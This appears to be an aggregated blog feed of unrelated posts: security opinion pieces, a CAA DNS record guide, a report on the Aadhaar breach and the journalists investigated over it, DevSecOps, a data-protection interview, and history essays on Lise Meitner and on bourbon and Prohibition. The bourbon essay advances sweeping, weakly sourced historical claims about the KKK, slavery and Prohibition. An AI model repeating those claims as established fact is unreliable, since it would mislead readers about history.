I have many issues with how "security" is being tossed around as a buzz-word to earn dollars, but very few respect the gravity or the very objective of its existence. I mean whether it's information, financial, or life security - they all have very realistic and quantifiable effects on someone's physical well-being. Every month, I see tens (if not hundreds) of reports and advisories where quality is embarrassingly bad. When you tap to find the right reasons - either the "good" firms are costly, or someone has a comfort zone with existing firms, or worst that neither the business care nor do they pressure firms for better quality. I mean at the end, it's a just plain & straightforward business transaction or a compliance check to make auditor happy.

Have you ever asked yourself the questions,

  1. You did a pentest justifying the money paid for your quality; tomorrow that hospital gets hacked, or patients die. Would you say you didn't put your best consultants/efforts because they were expensive for the cause? You didn't walk the extra mile because the budgeted hours finished?
  2. Now, to you Mr Business, CEO - You want to cut costs on security because you would prefer a more prominent advertisement or a better car in your garage, but security expenditure is dubious to you. Next time check how much companies and business have lost after getting breached. I mean just because it's not an urgent problem, doesn't say it can't be. If it becomes a problem, chances are it's too late. These issues are like symptoms; if you see them, you already are in trouble! Security doesn't always have an immediate ROI, I understand, but don't make it an epitome of "out of sight, out of mind". That's a significant risk you are taking on your revenue, employees or customers.

Now, while I have touched both sides of the problem in this short article; I hope you got the message (fingers crossed). Please do take security seriously, and not only as your business transaction! Every time you do something that involves security on either sides, think - You invest your next big crypto-currency in an exchange/ market that gets hacked because of their lack of due-diligence? Or, your medical records became public because someone didn't perform a good pen-test. Or, you lose your savings because your bank didn't do a thorough "security" check of its infrastructure. If you think you are untouchable because of your home router security; you, my friend are living in an illusion. And, my final rant to the firms where there are good consultants but the reporting, or seriousness in delivering the message to the business is so fcuking messed up, that all their efforts go in vain. Take your deliverable seriously; it's the only window business has to peep into the issues (existing or foreseen), and plan the remediation in time.

That's all my friends. Stay safe and be responsible; security is a cumulative effort and everyone has to be vigilant because you never know where the next cyber-attack be.

Meitnerium

Scientific American has a nice write-up of the theoretical physicist who discovered nuclear fission and was denied credit, yet assigned blame:

While the celebrity Meitner deserved was blatantly denied her, an undeserved association with the atomic bomb was bestowed. Meitner was outright opposed to nuclear weapons: “I will have nothing to do with a bomb!” Indeed, she was the only prominent Allied physicist to refuse an invitation to work on its construction at Los Alamos.

  • 1878 born in Vienna, Austria, third of eight children in middle-class family
  • 1892 at age 14 offered no more school, by 19th-century Austrian standards for girls. begins private lessons
  • 1905 earns PhD in physics from University of Vienna
  • 1907 moves to Berlin to access modern lab for research. denied her own lab because a woman, given an office in a basement closet, forced to use bathroom in a restaurant “down the street”
  • 1908 publishes three papers
  • 1909 publishes six papers
  • 1917 given salary and independent physics position
  • 1926 first woman in Germany to be made full professor
  • 1934 intrigued by Fermi work, begins research into nuclear reaction of uranium
  • 1938 Nazi regime forces her to leave Germany, because Jewish
  • 1944 Nobel prize awarded to the Berlin man who ran the lab she used for experiments

Amazing to see how determined she was and how she blazed a trail for others to do good. And yet the things she did, men wouldn’t give her credit for, while the thing she opposed was blamed on her instead.

Lost History of American Bourbon: Knob Creek

A friend recently went through my liquor cabinet and pulled out a mostly-empty bottle of Knob Creek. I had forgotten about it, although in the early-1990s it had been a favorite. It was introduced to me by a Milwaukee bartender in an old dark wooden dive of a bar on the city waterfront.

“I’ll take whatever” meant he poured me a glass of seltzer, stirred in a spoonful of very dark jam, threw an orange peel twist on top and told me “enjoy life, the old-fashioned way.” It sounded corny (pun not intended), especially when he also growled “this ain’t a bright lights and gin or vodka type place” (pre-prohibition, not a speakeasy).

“What’s with the jam?” I asked. He threw a thumb over his shoulder at a cast-iron looking tiny pot-belly stove against a black wall under a small brightly-lit window. I squinted. It was almost impossible to focus on except for its small red light. Steam was slowly rising from its top edges into the bright window. “Door County cherries” he said as he wiped the bar “pick’em myself. That’s my secret hot spiced mash.” This was an historic America, with heavy flavors from locally-grown ingredients, which contrasted sharply with what “popular” Milwaukee bars were serving (gin or vodka).

It was a very memorable drink. For years after I continued to have Knob Creek here and there, always thinking back fondly to that waterfront dive bar, and to the advice to avoid “bright lights and gin or vodka”. Knob Creek wasn’t exactly a replacement for the rye I really wanted, yet it was good-enough alternative, and I didn’t drink it fast enough to worry about its rather annoyingly high price of $15 a bottle.

Ok, so my friend pulls this old bottle of Knob Creek out of my cabinet. He’s drinking it and I’m telling him “no worries, that’s an old cheap bottle I can grab another…”. He chokes. “WHAAAT, nooo. Dude the Knob is one of Beam’s best, it’s a $50 bourbon. It’s the really good stuff.” Next thing I know my old Knob Creek bottle is in the recycling bin and I’m on the Internet wondering if I should replace it.

African-American Distillers May Have Invented Bourbon

A lot has changed in the world of American whiskey marketing since Knob Creek was $15

All the research I had done on Prohibition, a notoriously anti-immigrant white-supremacist movement targeting Germans and Irish, did not prepare me sufficiently for Jack Daniel’s recent adoption of its own history.

This year is the 150th anniversary of Jack Daniel’s, and the distillery, home to one of the world’s best-selling whiskeys, is using the occasion to tell a different, more complicated tale. Daniel, the company now says, didn’t learn distilling from Dan Call, but from a man named Nearis Green — one of Call’s slaves.

The real kicker to this Jack Daniel PR move is that it explains master distillers came from Africa, and slavery meant they ended up in regions that give them almost no credit today:

“[Slaves] were key to the operation in making whiskey,” said Steve Bashore, who helps run a working replica of Washington’s distillery. “In the ledgers, the slaves are actually listed as distillers.”

Slavery accompanied distilling as it moved inland in the late 18th century, to the newly settled regions that would become Tennessee and Kentucky.

[…]

American slaves had their own traditions of alcohol production, going back to the corn beer and fruit spirits of West Africa, and many Africans made alcohol illicitly while in slavery.

It makes sense, yet still I was surprised. And after I read that I started to pay attention to things I hadn’t noticed before. Like if you’ve ever watched “Hotel Rwanda” its opening song is “Umqombothi”, which has lyrics about a tradition of corn-mash used for beer in Africa.

Both the use of charred casks and corn mash foundations are being revealed by food historians as African traditions (even the banjo now, often associated with distilleries, is being credited to African Americans). Thus slaves from Africa are gradually being given credit as the true master distillers who brought Bourbon as a “distinctive product of the United States” to market.

Slave owners were not inclined to give credit, let alone keep records, so a lot of research unfortunately still is required to clarify what was going on between European and African traditions that ended up being distinctly American. That being said, common sense suggests a connection between African corn mash and master distiller role of African slaves that simply is too strong to ignore.

Prohibition Was Basically White Supremacists Perpetuating Civil War

If we recognize that master distillers using corn mash to invent Bourbon were most likely slaves from Africa, and also we recognize why and how Prohibition was pushed by the KKK, there is another connection too strong to ignore.

My studies had led me to believe anti-immigrant activists were behind banning the sale or production of alcohol in America. Now I see how this overlooks the incredibly important yet subtle point that master distillers were ex-slaves and their families on the verge of upward social mobility (Jack Daniel didn’t just take a recipe from Nearis Green, he hired two of his sons). The KKK pushed prohibition to block African American prosperity, as well as immigrants.

Let’s take this back a few years to look at the economics of prohibition. Attempts to ban alcohol had been tried by the British King to control his American colonies. In the 1730s a corporation of the King was charged with settling Georgia. A corporate board (“trustees”) was hoping to avoid what they saw as mistakes made in settling South Carolina. Most notably, huge plantations were thought to be undesirable because causing social inequalities (ironic, I know). So the King’s corporation running Georgia was looking at ways to force smaller parcels to create better distribution of wealth (lower concentrations power) among settlers. The corporation also tried to restrict use of Africans as slaves to entice harder working and better quality of settler and…believe it or not, they also tried to ban alcohol presumably because productivity loss.

These 1730s attempts to limit land grabs and ban slavery backfired spectacularly. It was the South Carolinian settlers who were moving into Georgia to out-compete their neighbors, so it kind of makes sense wealth was equated to grabbing land and throwing slaves at it instead of settlers themselves doing hard work. It didn’t take more than ten years before the corporation relented and Georgia regressed to South Carolina’s low settler standards. The alcohol ban (restricting primarily rum) also turned out to be ineffective because slaveowners simply pushed their slaves to distill new forms of alcohol from locally sourced ingredients (perhaps corn-based whisky) and smuggle it.

By the time a Declaration of Independence was being drafted, including some ideas about calling their King a tyrant for practicing slavery, it was elitist settlers of Georgia and South Carolina who demanded slavery not be touched. Perhaps it’s no surprise then 100 years later as Britain was finally banning slavery the southern states were still hung up about it and violent attacks were used to stop anyone even talking about abolishing slavery. While the rest of the Americas still under French, British, Spanish influence were banning slavery, the state of Georgia was on its way to declare Civil War in an expansionist attempt to spread slavery into America’s western territories.

So here’s the thing: the King’s corporation heads inadvertently had taught their colonies how slaves, alcohol and land were linked to wealth accumulation and power. White supremacists running government in Georgia and South Carolina (aspiring tyrants, jealous of the British King) wanted ownership for themselves to stay in power.

Prohibition thus denied non-whites entry to power and ensured racial inequality. Cheaters gonna cheat, and it seems kind of obvious in retrospect that prohibition by both the British King and the US government were clumsily designed to control the market.

The current era of bourbon enthusiasm is based on the products of about seven US distilleries. But before Prohibition, the US had thousands of distilleries! 183 in Kentucky alone. (When the Bottled-in-Bond act took effect in 1896, the nationwide count was reportedly over eight thousand). Each distillery produced many, many different brands.

Prohibition destroyed almost all of those historic distilleries.

From 8,000 small to 7 monster distilleries because…economic concerns of white supremacists running US government.

The KKK criminalized bourbon manufacturing. Thousands, including emancipated master distillers, were forced out of their field. Also in that Bottled-in-Bond year of 1896, incidentally, southern white-supremacists started erecting confederate monuments to terrorize the black population. By the time Woodrow Wilson was elected President in 1912 he summarily removed all blacks from federal government, which one could argue set the stage for a vote undermining black communities, and restarted the KKK by 1915. Prohibition thus arose within concerted efforts by white supremacists in America to reverse emancipation of African Americans, deny them social mobility, criminalize them arbitrarily, and disenfranchise them from government.

What’s War Got to Do With the Price of Knob Creek?

Have you ever heard of Otho Wathen’s defense of Whiskey during and after Prohibition?

Otho H. Wathen of National Straight Whiskey Distributing Co. points out: “The increase in 1934 (in drunken driver automobile accidents) for the entire country was 15.90 per cent. The increase in the repeal states, which included practically every big city where traffic is heaviest, was 14.65 per cent. …in the states retaining prohibition the increase was 21.56 per cent.”

I hadn’t heard of him until I read a blog post revealing that Knob Creek was a very old brand, bought inexpensively by National Distillers during the market collapse of Prohibition:

Knob Creek was first in use in 1898, by the Penn-Maryland Corp. I have looked through our archives here (I have the old history books from the companies we acquired when we purchased National Brands)

The blog even shows this “Cincinnati, Ohio” label as evidence of its antiquity:

This is an awkward bit of history, when you look at the origin story told by the Jim Beam conglomerate:

When the Prohibition was lifted in 1933, bourbon makers had to start from scratch. Whiskey takes years and years to make, but the drinking ban was overturned overnight. To meet their sudden demand, distillers rushed the process, selling barrels that had hardly been aged. Softer, mild-flavored whiskey became standard from then on. Full flavor was the casualty.

But we brought real bourbon back. Over 25 years ago, master distiller Booker Noe set out to create a whiskey that adhered to the original, time-tested way of doing things. He named it Knob Creek

They’ve removed the text about Knob Creek being a physical place. When I first bought a bottle it came with marketing that referenced Knob Creek Farm, a non-contiguous section of the Abraham Lincoln Birthplace National Historical Park. That’s definitely no longer the case (pun not intended) as all the marketing today says white distillers of Jim Beam are resurrecting pre-prohibition traditions, without specifying the traditions came from slaves.

From that perspective, I’m curious if anyone has looked into the Penn-Maryland decision to name its whiskey after an Abraham Lincoln landmark. Does it imply in some way the emancipation of distillers, which Beam now is claiming simply as pre-prohibition style? More to the point, if Jack Daniel is finding slavery in its origin story and making reference to the injustices of credit taken, will Beam take the hint or continue to call Knob Creek their recent innovation?

My guess, based on reading the many comments on the “post-age” Knob Creek now being made (the bottles used to say 9 year), Beam is moving further away from credit to master distillers who were emancipated by Lincoln. So I guess, to answer my original question, buying another bottle of Knob makes little sense until I see evidence they’re giving credit to America’s black master distillers who invented the flavor and maybe even that label.

In the meantime, I’ll just keep sipping on this 1908 Old Crow (Woodford)…

Laws stopped cousin-marriage, not mobility

Collecting huge datasets for analysis has since the beginning of time been a good way to find insights. Recently some theories about safety and longevity of cousin marriage are being challenged by the power of big data systems:

researchers suggest that people stopped marrying their fourth cousins not due to increased mobility between different regions, but because the practice became less socially acceptable

“Less socially acceptable” is another way of saying laws against it were being passed. According to the seminal book on this subject, by someone with the same name as me, mathematical modeling show how those laws against cousin marriage were based in prejudice, not science.

Forbidden Relatives challenges the belief – widely held in the United States – that legislation against marriage between first cousins is based on a biological risk to offspring. In fact, its author maintains, the U.S. prohibition against such unions originated largely because of the belief that it would promote more rapid assimilation of immigrants.

Immigrants were barred from continuing their historic practices, much in the same way prohibition of alcohol criminalized Germans for their breweries and Irish for having distilleries. Keep these reports and books in mind the next time someone says cousin marriage is a concern for human safety or longevity.

How to filter and query SSL/TLS certs for intelligence

How to filter and query SSL/TLS certs for intelligence

Recently I noticed a new service/ project that is turning few heads among my peers in security community - CertDB. A one of its kind which indexes the domains SSL certs with their details, IP records, geo-location and timelines, common-name etc. They term themselves as Internet-wide search engine for digital certificates. They have a unique business statement when you get to understand the different components (search vectors) they are incorporating in this project. I know there are few transparent cert registries like Certificate Search but as per their website,

Examining the data hidden in digital certificates provides a lot of insight about business activity in a particular geography or even collaboration between 2 different companies.

I know and agree with them on these insights that they do come handy while performing reconnaissance during a security assessment (OR) validating the SSL/ TLS certificates for your client. It does reflect on the fact that maybe the certificate is about to expire, or new domains have been registered in the same certificate (example, Subject Alternate Name: DNS Name). But when I browsed through their project website, I was surprised the way they articulated their USP (unique selling point),

For example, the registration of a new unknown domain in Palo Alto hints at a new start-up; switching from the "Wildcard" certificate to "Let's Encrypt" tells us about the organization's budget constraints; issuing a certificate in an organization with domains of another organization speaks about collaboration between companies, or even at an acquisition of one company by another.

Now, I am intrigued to do a detailed article on their services, business model, filters and even an interview with their project team.

Question: Are you curious/interested, and what would you like to ask them? Do leave a comment.

Do you want to read more on certDB?
Yes
No
meh, I am Swiss.

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

It's been a long time since I audited someone's DNS file but recently while checking a client's DNS configuration I was surprised that the CAA records were set randomly "so to speak". I discussed with the administrator and was surprised to see that he has no clue of CAA, how it works and why is it so important to enable it correctly. That made me wonder, how many of us actually know that; and how can it be a savior if someone attempts to get SSL certificate for your domain.

What is CAA?

CAA or Certificate Authority Authorization is a record that identifies which CA (certificate authorities) are allowed to issue certificate for the domain in question. It is declared via CAA type in the DNS records which is publicly viewable, and can be verified before issuing certificate by a certificate authority.

Brief Background

While the first draft was documented by Phillip Hallem-Baker and Rob Stradling back in 2010, it accelerated the work in last 5 years due to issues with CA and hacks around. The first CA subversion was in 2001 when VeriSign issued 2 certificates to an individual claiming to represent Microsoft; these were named "Microsoft Corporation". These certificate(s) could have been used to spoof identity, and providing malicious updates etc. Further in 2011 fraudelent certificates were issued by Comodo[1] and DigiNotar[2] after being attacked by Iranian hackers (more on Comodo attack, and dutch DigiNotar attack); an evidence of their use in a MITM attack in Iran.

Further in 2012 Trustwave issued[3] a sub-root certificate that was used to sniff SSL traffic in the name of transparent traffic management. So, it's time CA are restricted or whitelisted at domain level.

What if no CAA record is configured in DNS?

Simply put the CAA record shall be configured to announce which CA (certificate authorities) are permitted to issue a certificate for your domain. Wherein, if no CAA record is provided, any CA can issue a certificate for your domain.

CAA is a good practice to restrict your CA presence, and their power(s) to legally issue certificate for your domain. It's like whitelisting them in your domain!

The process mandates a Certificate Authority[4] (yes, it mandates now!) to query DNS for your CAA record, and the certificate can only be issued for your hostname, if either no record is available, or this CA has been "whitelisted". The CAA record enables the rules for the parent domain, and the same are inherited by sub-domains. (unless otherwise stated in DNS records).

Certificates authorities interpret the lack of a CAA record to authorize unrestricted issuance, and the presence of a single blank issue tag to disallow all issuance.[5]

CAA record syntax/ format

The CAA record has the following format: <flag> <tag> <value> and has the following meaning,

Tag Name Usage
flag This is an integer flag with values 1-255 as defined in the RFC 6844[6]. It is currently used to call the critical flag.[7]
tag This is an ASCII string (issue, issuewild, iodef) which identifies the property represented by the record policy.
value The value of the property defined in the <tag>

The tags defined in the RFC have the following meaning and understanding with the CA records,

  • issue: Explicitly authorizes a "single certificate authority" to issue any type of certificate for the domain in scope.
  • issuewild: Explicitly authorizes a "single certificate authority" to issue only a wildcard certificate for the domain in scope.
  • iodef: certificate authorities will report the violations accordingly if the certificate is issued, or requested that breach the CAA policy defined in the DNS records. (options: mailto:, http:// or https://)
DNS Software Support

As per excerpt from Wikipedia[8]: CAA records are supported by BIND (since version 9.10.1B),Knot DNS (since version 2.2.0), ldns (since version 1.6.17), NSD (as of version 4.0.1), OpenDNSSEC, PowerDNS (since version 4.0.0), Simple DNS Plus (since version 6.0), tinydns and Windows Server 2016.
Many hosted DNS providers also support CAA records, including Amazon Route 53, Cloudflare, DNS Made Easy and Google Cloud DNS.

Example: (my own website DNS)

As per the policy, I have configured that ONLY "letsencrypt.org" but due to Cloudflare Universal SSL support, the following certificate authorities get configured as well,

  • 0 issue "comodoca.com"
  • 0 issue "digicert.com"
  • 0 issue "globalsign.com"
  • 0 issuewild "comodoca.com"
  • 0 issuewild "digicert.com"
  • 0 issuewild "globalsign.com"

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

Also, configured iodef for violation: 0 iodef "mailto:hello@cybersins.com"

How's the WWW doing with CAA?

After the auditing exercise I was curious to know how are top 10,000 alexa websites doing with CAA and strangely enough I was surprised with the results: only 4% of top 10K websites have CAA DNS record.

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

[Update 27-Feb-18]: This pie chart was updated with correct numbers. Thanks to Ich Bin Niche Sie for identifying the calculation error.

Now, we have still a long way to go with new security flags and policies like "CAA DNS Record", "security.txt" file etc. and I shall be covering these topics continuously to evangelize security in all possible means without disrupting business. Remember to always work hand in hand with the business.

Stay safe, and tuned in.


  1. Comodo CA attack by Iranian hackers: https://arstechnica.com/information-technology/2011/03/independent-iranian-hacker-claims-responsibility-for-comodo-hack/ ↩︎

  2. Dutch DigiNotar attack by Iranian hackers: https://arstechnica.com/information-technology/2011/08/earlier-this-year-an-iranian/ ↩︎

  3. Trustwave Subroot Certificate: http://www.h-online.com/security/news/item/Trustwave-issued-a-man-in-the-middle-certificate-1429982.html ↩︎

  4. CAA Checking Mandatory (Ballot 187 results) 2017: https://cabforum.org/pipermail/public/2017-March/009988.html ↩︎

  5. Wikipedia Article: https://en.wikipedia.org/wiki/DNS_Certification_Authority_Authorization ↩︎

  6. IETF RFC 6844 on CAA record: https://tools.ietf.org/html/rfc6844 ↩︎

  7. The confusion of critical flag: https://tools.ietf.org/html/rfc6844#section-7.3 ↩︎

  8. Wikipedia Support Section: https://en.wikipedia.org/wiki/DNS_Certification_Authority_Authorization#Support ↩︎

New World, New Rules: Securing the Future State

I published an article today on the Oracle Cloud Security blog that takes a look at how approaches to information security must adapt to address the needs of the future state (of IT). For some organizations, it's really the current state. But, I like the term future state because it's inclusive of more than just cloud or hybrid cloud. It's the universe of Information Technology the way it will be in 5-10 years. It includes the changes in user behavior, infrastructure, IT buying, regulations, business evolution, consumerization, and many other factors that are all evolving simultaneously.

As we move toward that new world, our approach to security must adapt. Humans chasing down anomalies by searching through logs is an approach that will not scale and will not suffice. I included a reference in the article to a book called Afterlife. In it, the protagonist, FBI Agent Will Brody says "If you never change tactics, you lose the moment the enemy changes theirs." It's a fitting quote. Not only must we adapt to survive, we need to deploy IT on a platform that's designed for constant change, for massive scale, for deep analytics, and for autonomous security. New World, New Rules.

Here are a few excerpts:
Our environment is transforming rapidly. The assets we're protecting today look very different than they did just a few years ago. In addition to owned data centers, our workloads are being spread across multiple cloud platforms and services. Users are more mobile than ever. And we don’t have control over the networks, devices, or applications where our data is being accessed. It’s a vastly distributed environment where there’s no single, connected, and controlled network. Line-of-Business managers purchase compute power and SaaS applications with minimal initial investment and no oversight. And end-users access company data via consumer-oriented services from their personal devices. It's grown increasingly difficult to tell where company data resides, who is using it, and ultimately where new risks are emerging. This transformation is on-going and the threats we’re facing are morphing and evolving to take advantage of the inherent lack of visibility.
Here's the good news: The technologies that have exacerbated the problem can also be used to address it. On-premises SIEM solutions based on appliance technology may not have the reach required to address today's IT landscape. But, an integrated SIEM+UEBA designed from the ground up to run as a cloud service and to address the massively distributed hybrid cloud environment can leverage technologies like machine learning and threat intelligence to provide the visibility and intelligence that is so urgently needed.
Machine Learning (ML) mitigates the complexity of understanding what's actually happening and of sifting through massive amounts of activity that may otherwise appear to humans as normal. Modern attacks leverage distributed compute power and ML-based intelligence. So, countering those attacks requires a security solution with equal amounts of intelligence and compute power. As Larry Ellison recently said, "It can't be our people versus their computers. We're going to lose that war. It's got to be our computers versus their computers."
Click to read the full article: New World, New Rules: Securing the Future State.

Indian government, faced with massive data breach, targets journalists

Instead of rushing to fix the problem that has exposed the private information of over a billion Indians, it is criminally investigating the journalists who exposed it.
Leszek Leszczynski

In the course of an extremely disturbing data breach, the Indian government has potentially violated the privacy of over one billion of its citizens. Now, instead of rushing to fix the problem that has exposed the private information of over 90% of Indians, it is criminally investigating the journalists who brought it to the public’s attention.

A branch of the Indian government filed a police complaint last week launching an investigation into journalist Rachna Khaira and the Tribune of India, after the publication released a report describing what looks to be a massive vulnerability in a government database that is being exploited by an unknown group to sell highly sensitive and private data about Indian citizens.

Khaira wrote an article on January 4 detailing how reporters were able to easily purchase access to the personal information of over one billion Indian citizens from the national identity database—for the price of approximately $8 USD. She bought the access from an unknown seller, and settled the small fee via digital payment. The Unique Identification Authority of India (UIDAI), which manages the database, initially denied the breach of the system before filing a complaint against the journalist and her publication and accusing them of criminal conspiracy.  

The Aadhaar database is the largest of its kind in the world, and contains both biometric data like fingerprints and personal details like addresses and phone numbers, that, when combined, build unique and detailed profiles of its citizens. Participation in the database is required to access basic services like filing tax returns, and this normalization of government collection and retention of such intimidate data raises serious civil liberties and privacy concerns.

The Tribune reported that this isn’t the first time the database has been breached, and that the UIDAI is aware of past unauthorized attempts to access the database. Many Indian privacy advocates have long been warning that exactly this type of worst case scenario would occur.

At a minimum, the size and sensitivity of this system should make its security a paramount priority for UIDAI, since this concentration of identifying information makes it extremely susceptible to exploitation. So far, the agency hasn’t addressed the vulnerability or closed the loopholes in the system discovered by security researchers and journalists, but rather attacked the press for doing its job.   

The police complaint, called a First Information Report, has been widely condemned by human rights and press freedom organizations, including the Editors Guild of India and Amnesty International. Edward Snowden, Freedom of the Press Foundation’s board president, wrote on Twitter this week:

“The journalists exposing the #Aadhaar breach deserve an award, not an investigation. If the government were truly concerned for justice, they would be reforming the policies that destroyed the privacy of a billion Indians. Want to arrest those responsible? They are called @UIDAI.”

After an outpour of public criticism to its response to the breach, UIDAI tweeted on January 8 claiming to defend journalism. “UIDAI is committed to the freedom of Press. We're going to write to @thetribunechd & @rachnakhaira to give all assistance to investigate to nab the real culprits. We also appreciate if Tribune & its journalist have any constructive suggestion to offer.”

Despite this statement, UIDAI continues to investigate Khaira and the Tribune under the Aadhaar Act.

The targeting of Khaira and the Tribune by UIDAI is just the latest example of attempts to curb press freedom and stifle investigative journalism in India. Last year, the UIDAI filed an FIR against a CNN-News 18 journalist for a report on how it was possible to obtain two separate Aadhaar enrollment numbers. Courts allow public figures to bring spurious defamation lawsuits against publications such as The Wire that are meant to stifle critical reporting. The Indian government regularly uses a draconian sedition law to censor the press, particularly when it investigates state corruption.

India ranked 136th in the World Press Freedom Index in 2017, a decline from 2016. According to the Committee to Protect Journalists, at least 75 journalists were killed in India between 1992 and 2018. Veteran journalist Gauri Lankesh, who was known for her critical reporting on inequality and racial discrimination, was recently murdered in front of her house.

The Indian government has a responsibility to vigorously defend the press in both words and actions. As long as it targets journalists and newspapers for reporting information vital to the public interest rather than acting to protect the privacy of its citizens, the UIDAI cannot seriously claim to defend democracy and the free press.


DevSecOps is coming! Don’t be afraid of change.

DevSecOps is coming! Don't be afraid of change.

There has been a lot of buzz about the relationship between Security and DevOps as if we are debating their happy companionship. To me they are soulmates, and DevSecOps is a workable, scalable, and quantifiable fact unlike the big button if applied wisely.

What is DevOps?

The development cycle has undergone considerable changes in last few years. Customers and clients have evolving requirements and the market demands speed, and quality. The relationship between developers and operations have grown much closer to address this change. IT infrastructure has evolved in parallel to cater to quick timelines, and release cycles. The old legacy infrastructure with multiple toll gates if drifting away, and fast, responsive API(s) are taking place to spawn and scale vast instances of software and hardware.

Developers who were slowly getting closer to the operations team have now decided to wear both the hats and skip a 'redundant' hop. This integration has helped organisations achieve quick releases with better application stability and response times. Now, the demands of the customer or end-user can be addressed & delivered directly by the DevOps team. Sometimes people confuse agile and DevOps and its natural with the everchanging landscape.

Simply put, Agile is a methodology and is about processes (scrums, sprints etc.) while DevOps is about technical integration (CI/CD, tool and IT automation)

While Agile talks about SDLC, DevOps also integrate Operations and fluidity in Agile. It focuses on being closer to the customer and not just committing working software. DevOps in its arsenal has many tools that support - release, monitoring, management, virtualisation, automation, and orchestration of different parts of delivery fast and efficient. Its the need of the hour with the constant changes in requirements, and ecosystem. It has to evolve & release ongoing updates to keep up with the pace of the customer, and market demands. It's not mono-directional water flow; Instead, it's like an omnidirectional tube of water flowing in a gravity-free ecosystem.

What is DevSecOps?

The primary objective of DevSecOps is to integrate security at early stages of development on the process side and to make sure everyone in the team is responsible for security. It evangelises security as a strong glue to hold the bond between development and operations, by the single task force. In DecSecOps, security ought to be a part of automation via tools, controls and processes.

Traditional SDLC (software development life cycle) often perceives security as a toll gate at the end, to validate the efforts on the scale of visible threats. In DevSecOps, security is everywhere, at all stages/ phases of development and operations. It is embedded right into the life cycle that has a continuous integration between the drawing pad, security tools, and release cycle.

As Gartner documents, DevSecOps can be depicted graphically as the rapid and agile iteration from development into operations, with continuous monitoring and analytics at the core.

DevSecOps is coming! Don't be afraid of change.
Photo by Redmine

Another key driving factor for DevSecOps is the fact that perimeter security is failing to adjust with increasing integration points and the blurring of the trust boundaries. It's getting less opaque and fuzzier where the perimeter is in this cyber ecosystem. It is eminent that software has to be inherently secure itself without relying on the border security controls. Rapid development and releases lead to shortening the supply chain timeline to implement custom controls like filters, policies and firewalls.

I have tried to make the terms well understandable in this series; there are many challenges faced by organizations, and their possible solutions which I shall cover in next article.
Stay tuned.

An Interview by Timecamp on Data Protection

An Interview by Timecamp on Data Protection

A few months back I was featured in an interview on Data Protection Tips with Timecamp. Only a handful of questions but they are well articultated for any organisation which is proactive & wants to address security in corporations, and their employees' & customers responsibilities.

--

How do you evaluate people's awareness regarding the need to protect their private data?

This is an exciting question as we have often faced challenges during data protection training on how to evaluate with certainty that a person understood the importance of data security & is not just mugging for the test.

Enterprise Security is as closely related to the systems as with the people interacting with them.

One way to perform evaluations is to include surprise checks and discussions within the teams. A team of security aware individuals are trained and then asked to carry on the tasks of such inspections. For example, if a laptop is found logged-in, and unattended for long, the team confuscates it and submits to a C-level executive (e.g. CIO or COO). As a consultant, I have also worked on an innovative solution of using such awareness questions as "the second level" check while logging into the intranet applications. And, we all are aware of phishing campaigns that management can execute on all employees and measure their receptiveness to such emails. But, it must be followed up with training on how an individual can detect such attack, and what can it can do to avoid falling prey to such scammers in the future. We must understand that while data protection is vital, all the awareness training and assessment should not cause speed bumps in a daily schedule.

These awareness checks must be regularly performed without adding much stress for the employee. More the effort, more the employee would like to either bypass or avoid it. Security teams must work with the employees and support their understanding of data protection.Data protection must function as the inception of understanding security, and not a forced argument.

Do you think that an average user pays enough attention to the issue of data protection?

Data protection is an issue which can only be dealt with a cumulative effort, and though each one of us cares about privacy, few do that collectively within an enterprise.It is critical to understand that security is a culture, not a product. It needs an ongoing commitment to providing a resilient ecosystem for the business. Social engineering is on the rise with phishing attacks, USB drops, fraudulent calls and messages. An employee must understand that their casual approach towards data protection, can bring the whole business to ground zero. And, core business must be cautious when they do data identification and classification. The business must discern the scope of their application, and specify what's the direct/ indirect risk if the data gets breached. Data breach is not only an immediate loss of information but a ripple effect leading to disclosure of the enterprise's inner sanctum.

Now, how close are we to achieving this? Unfortunately, we are far from the point where an "average user" accepts data protection as a cornerstone of success in the world where information in the asset. Businesses consider security as a tollgate which everyone wants to bypass because neither do they like riding with it, nor being assessed by it. Reliable data protection can be achieved when it's not a one-time effort, but the base to build our technology.

Until unless we use the words "security" and "obvious" in the same line, positively, it would always be a challenge which an "average user" would try to deceive than achieve.

Why is the introduction of procedures for the protection of federal information systems and organisations so important?

Policies and procedures are essential for the protection of federal or local information as they harmonise security with usability. We should understand security is a long road, and when we attempt to protect data, it often has its quirks which confuse or discourages an enterprise to evolve. I have witnessed many fortune 500 firms safeguard their assets and getting absorbed in like it's a black hole. They invest millions of dollars and still don't reach par with the scope & requirements. Therefore, it becomes essential to understand the needs of business, the data it handles, and which procedures apply in their range. Now, specifically, procedures help keep the teams aligned in how to implement a technology or a product for the enterprise. Team experts or SME, usually have a telescopic vision in their domain, but a blind eye on the broader defence in depth.Their skills tunnel their view, but a procedure helps them to attain sync with the current security posture, and the projected roadmap. Also, a procedure reduces the probability of error while aligning with a holistic approach towards security. A procedure dictates what and how to do, thereby leaving a minimal margin of misunderstanding in implementing sophisticated security measures.

Are there any automated methods to test the data susceptibility to cyber-attacks, for instance, by the use of frameworks like Metasploit? How reliable are they in comparison to manual audits?

Yes, there are automated methods to perform audits, and to some extent, they are well devised to detect low hanging fruits. In simpler terms, a computerised assessment has three key phases - Information gathering, tool execution to identify issues, report review. Security aware companies and the ones that fall under strict regulations often integrate such tools in their development and staging environments. This CI (continuous integration) keeps the code clean and checks for vulnerabilities and bugs on a regular basis. It also helps smoothen out the errors that might have come in due to using existing code, or outdated functions. On the other side, there are tools which validate the sanity of the production environment and also perform regular checks on the infrastructure and data flows.

Are these automated tools enough? No. They are not "smart" enough to replace manual audits.

They can validate configurations & issues in the software, but they can't evolve with the threat landscape. Manual inspections, on the other hand, provide a peripheral vision while verifying the ecosystem resilience. It is essential to have manual audits, and use the feedback to assess, and even further tune the tools. If you are working in a regulated and well-observed domain like finance, health or data collection - the compliance officer would always rely on manual audits for final assurance. The tools are still there to support, but remember, they are as good as they are programmed and configured to do.

How to present procedures preventing attacks in one's company, e.g., to external customers who demand an adequate level of data protection?

This is a paramount concern, and thanks for asking this. External clients need to "trust you" before they can share data, or plug you into their organisation. The best approach that has worked for me is an assurance by what you have, and how well are you prepared for the worst.> The cyber world is very fragile, and earlier we used to construct "if things go bad ... " but now we say "when things go bad ...".

